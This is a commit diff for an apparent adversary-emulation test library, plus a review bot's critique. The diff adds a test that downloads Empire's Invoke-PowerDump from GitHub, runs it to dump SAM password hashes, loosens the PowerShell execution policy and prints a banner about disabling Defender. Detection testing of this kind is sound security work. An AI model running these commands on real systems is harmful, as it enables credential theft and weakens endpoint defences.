Update T1003.002.yaml for PowerDump (#1196)
* Update T1003.002.yaml for PowerDump Added PowerDump to parse SAM and SYSTEM for usernames and Hash * Add fixes Updated with fixes. It's not erroring with Multiple cleanup Removed preReqs, don't need them Removed SAM and SYSTEM file dep... PowerDump can just Dump Registry for Hashes and Usernames * Getting permanent links to file Added permanent link to PowerDump in BC-SECURITY GitHub * updated description Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
@@ -78,4 +78,18 @@ atomic_tests:
|
||||
del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
|
||||
- name: PowerDump Registry dump of SAM for hashes and usernames
|
||||
description: Executes a hashdump by reading the hasshes from the registry.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
|
||||
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
|
||||
Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
|
||||
Import-Module .\PowerDump.ps1
|
||||
Invoke-PowerDump
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
|
||||
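Review bot: The download target and the import path in the new PowerDump test do not match — `Invoke-Webrequest` writes to `$Env:Temp\PowerDump.ps1`, but `Import-Module .\PowerDump.ps1` resolves against the current working directory, so the import fails unless the runner happens to be in %TEMP%; change it to `Import-Module "$Env:Temp\PowerDump.ps1"`. The URL is also a GitHub `blob` page rather than the raw file, so `-OutFile` most likely saves an HTML page instead of the script — confirm and point it at the raw file for that same pinned commit, otherwise the test silently produces no telemetry and looks like a passed detection. The `Write-Host` line announces disabling Defender real-time monitoring, but nothing in the command does that; drop the claim so the test's output matches what it actually does. The executor leaves the script in %TEMP% and persistently changes the CurrentUser execution policy with no `cleanup_command`; add at least `cleanup_command: Remove-Item "$Env:Temp\PowerDump.ps1" -ErrorAction Ignore`. The description also misspells `hashes` as `hasshes`.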